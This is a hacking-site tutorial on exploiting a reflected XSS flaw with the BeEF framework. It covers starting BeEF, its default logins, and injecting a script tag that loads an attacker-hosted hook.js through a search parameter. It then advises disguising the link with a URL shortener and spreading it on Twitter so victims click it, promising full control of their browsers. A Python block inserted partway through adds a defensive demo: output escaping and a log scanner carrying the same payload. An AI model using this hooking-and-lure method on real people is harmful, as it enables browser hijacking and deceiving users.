Null Byte

Exploiting XSS with BeEF: Part 2

May 7, 2015 11:49 AM
Jun 23, 2015 04:39 PM

Now that we have our vulnerable server, it's time to start up BeEF.

Getting Started

Running BeEF

If you have Kali, BeEF comes pre-installed. You can find it in /usr/share/beef-xss/. Once you're there, type ./beef to execute the program.


BeEF prints two addresses when it starts, and you will need to know both of them. The top one is for the browser-hooking JavaScript file, and the second one is for accessing the web UI.

Getting into the UI

Once BeEF is running, you can access the web UI through your browser. Enter http://your_ip:3000/ui/panel and you will be redirected to the login page.


The default credentials are beef for both the username and password. After logging in, you will be presented with the start/help screen.


Exploiting

Build the Malicious Code

Remember that line of text from the terminal earlier? That's the location of our malicious JS code. For me, it's http://10.0.2.13:3000/hook.js.

Since we want this to be run as code, we will implement this with the

Making the URL

Let's go back to when we searched for something. When we did, the URL contained the part ...?query=lorem+ipsum. This is the part of the URL that tells the website what is being searched for. By using XSS, we can take this further and run pretty much whatever we want. When we build our URL, it should look like http://victimsite.com/search.asp?query=

When the victim visits this URL, the site automatically "searches" for whatever follows query=. But because what we put there is a script, the browser runs it as a script instead of treating it as a search term.
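Seen from the defender's side, as an added example that is not from the original article: a Python model of the reflected search page described above, once reflecting the query verbatim and once with output encoding, plus a scan of constructed access-log lines for the kind of script injection a hook would ride on. The detection regex, the log lines and every address other than the article's 10.0.2.13 are constructed for the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample payload: the article's hook.js URL wrapped in a script tag.
HOOK_PAYLOAD = '<script src="http://10.0.2.13:3000/hook.js"></script>'


def render_search_unsafe(query: str) -> str:
    """Reflects the query verbatim: a script tag in it reaches the browser as markup."""
    return f"<h1>Results for: {query}</h1>"


def render_search_safe(query: str) -> str:
    """Same page with output encoding: < > & and quotes become HTML entities."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


# Hypothetical pattern for the demo, not a production WAF rule.
_SCRIPT_PATTERN = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)
_REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_params(request_target: str) -> list:
    """Names of query parameters in a request target whose decoded value looks like script injection."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return [name for name, values in params.items()
            if any(_SCRIPT_PATTERN.search(v) for v in values)]


def scan_log(lines) -> list:
    """Return (client_ip, flagged_params) for each access-log line carrying a suspicious query."""
    hits = []
    for line in lines:
        match = _REQUEST_TARGET.search(line)
        if match:
            flagged = suspicious_params(match.group(1))
            if flagged:
                hits.append((line.split()[0], flagged))
    return hits


# Constructed access-log lines: one benign search, one carrying the URL-encoded hook payload.
SAMPLE_LOG = [
    '10.0.2.5 - - [07/May/2015:11:49:00 +0000] "GET /search.asp?query=lorem+ipsum HTTP/1.1" 200 1523',
    '10.0.2.7 - - [07/May/2015:11:50:12 +0000] "GET /search.asp?query=%3Cscript+src%3D%22http%3A%2F%2F'
    '10.0.2.13%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 1601',
]

if __name__ == "__main__":
    print(render_search_unsafe(HOOK_PAYLOAD))
    print(render_search_safe(HOOK_PAYLOAD))
    print(scan_log(SAMPLE_LOG))
```

The encoded page shows the fix that removes the reflection the article relies on; the log scan shows what the same request looks like to someone reviewing the web server's access log.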

Sending to a Victim

In order to "hook" their browser, we need to send them this link. Of course, a raw link like this might seem suspicious to the average user. If we use a URL shortener like bit.ly, the destination is hidden, and more people will click on it on social media.

Most websites that let you share articles, videos, etc. automatically include a bit.ly link in the message. If you share this bit.ly link on Twitter, no one will suspect that it is malicious.

http://bit.ly/1EjY8Tq

Doesn't that look much better than http://victimsite.com/search.asp?query=? I think so.

Done!

Once someone clicks on that innocent-looking link, you will have complete control over their browser! If you are attacking over WAN, don't forget to port forward.

Next Time...

In my next article, I will be explaining how to get a persistent connection with BeEF, including how to get a shell on the victim PC.

C|H of C3
